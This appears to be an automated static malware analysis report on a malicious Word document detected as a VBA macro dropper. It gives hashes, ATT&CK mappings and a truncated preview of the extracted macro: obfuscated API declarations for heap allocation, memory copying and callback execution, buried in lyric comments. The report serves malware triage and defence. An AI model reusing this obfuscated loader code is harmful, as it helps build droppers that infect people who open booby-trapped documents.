Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 318c27af2a760218…

MALICIOUS

Office (OLE)

175.0 KB Created: 2016-10-04 13:50:00 Authoring application: Microsoft Office Word First seen: 2020-04-06
MD5: 2d1382a041842b324fd6b76265c39d22 SHA-1: af0afeedc8f55605006deb355b89df68c0ac7bfd SHA-256: 318c27af2a76021887363dc1571bd35630a4c32d0c048cb37628f08b4ce02981
82 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6592057-0, indicating it is a dropper. The presence of VBA macros further supports this, as they are commonly used to download and execute additional malicious content. The macro code itself is heavily obfuscated with comments and uses API calls that suggest it is designed to facilitate the execution of a secondary payload.

Heuristics 3

  • ClamAV: Doc.Dropper.Agent-6592057-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6592057-0
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7886 bytes
SHA-256: 68e04ae8fdd2951af98d803ea8eec468bee70eeaac9a91c15688f1199834731e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "acknowledgment"
'Where is my home and where am I going?
'When will I know and how will I know?
#If Win64 Then
'Like a lover turning into a friend
'Where is my home and where am I going?
Public  Declare PtrSafe Function italy Lib "kernel32" Alias "HeapCreate" (ByVal piroplasm As LongPtr, ByVal breastfed As LongPtr, ByVal obligatorily As LongPtr) As LongPtr
'And I don't know if it ever will mend
'Why do I feel like I'm in a hurry
Public Declare PtrSafe Function onesided Lib "kernel32" Alias "RemoveDirectoryA" (dendroaspis As LongPtr)
'Like a lover turning into a friend
'Why do I feel like I'm in a hurry
Public  Declare PtrSafe Function jaculate Lib "kernel32" Alias "HeapAlloc" (ByVal competing As LongPtr, ByVal surviving As LongPtr, ByVal rudiments As LongPtr) As LongPtr
'How does the whole thing end?
'I want to believe in something I feel
Public Declare PtrSafe Function nondisposable Lib "kernel32" Alias "TlsAlloc" () As LongPtr
'And I don't know if it ever will mend
'I had a lover who turned into a friend
Public Declare PtrSafe Function biannually Lib "user32" Alias "EndDialog" (ByVal jaded As LongPtr,nResult As LongPtr) As LongPtr
'Like a lover turning into a friend
'I had a lover who turned into a friend
Public Declare PtrSafe Function bloodlessly Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr)
'When will I know and how will I know?
'Will I always be here spinning my wheels
Public  Declare PtrSafe Function malted Lib "kernel32" Alias _
"EnumSystemLanguageGroupsA" (ByVal lpEnumFunc As Any, ByVal hModule As Any, lParam As Any) As LongPtr
'I had a lover who turned into a friend
'When will I marry
Public Declare PtrSafe Function chemoreceptive Lib "user32" Alias "GetDC" (ByVal archtraitor As LongPtr) As LongPtr
'Or does misfortune have a hand in the deal
'Who will be king and who will be beggar?
Public  Declare PtrSafe Sub necessary Lib "ntdll" Alias "RtlMoveMemory" (dishevel As Any, perm As Any, ByVal conjugate As LongPtr)
'Why do I cry for nothing sometimes
'I want to believe in a nurturing love

'I want to believe love has a chance to survive
'Why do I cry for nothing sometimes
#Else
'Nothing's for sure except growing old
'And I don't know if it ever will mend
Public Declare Function malted Lib "kernel32" Alias _
"EnumSystemLanguageGroupsA" (ByVal lpEnumFunc As Any, ByVal katmandu As Any, lParam As Any) As Long
'And I don't know if it ever will mend
'Somewhere a heart is getting broken again
Public Declare Function monitive Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long)
'And I don't know if it ever will mend
'When will I know and how will I know?
Public Declare Function bakelite Lib "user32" Alias "GetDC" (chlorambucil As Long) As Long
'And not just a sacrifice
'Who will be king and who will be beggar?
Public Declare Function sledding Lib "kernel32" Alias "RemoveDirectoryA" (defecation As Long)
'I want to believe in something I feel
'Like a lover turning into a friend
Public Declare Function beast Lib "user32" Alias "EndDialog" (ByVal ophicleide As Long, killing As Long) As Long
'When will I know and how will I know?
'The dream to be as one
Public Declare Sub necessary Lib "ntdll" Alias "RtlMoveMemory" (holder As Any, stemwinder As Any, ByVal anthropophagist As Long)
'When will I know and how will I know?
'When will I marry
Public Declare Function italy Lib "kernel32" Alias "HeapCreate" (ByVal unlined As Long, ByVal bedmate As Long, ByVal foulard As Long) As Long
'When will I have this mystery solved?
'Feels like a race and I'm out of time
Public Declare Function jaculate Lib "kernel32" Alias "HeapAlloc" (ByVal acreage As Long, ByVal penguin As Long, ByVal housebreaking As Long) As Long
'I want to believe in a nurturing love
'The dream to be as one
Public Declare Function earless Lib "kernel32" Alias "TlsAlloc" () As Long
'The dream to be as one
'Nothing's for sure except growing old

'Why do I feel like I'm in a hurry
'The dream to be as one
#End If
'I want to believe love has a chance to survive
... (truncated)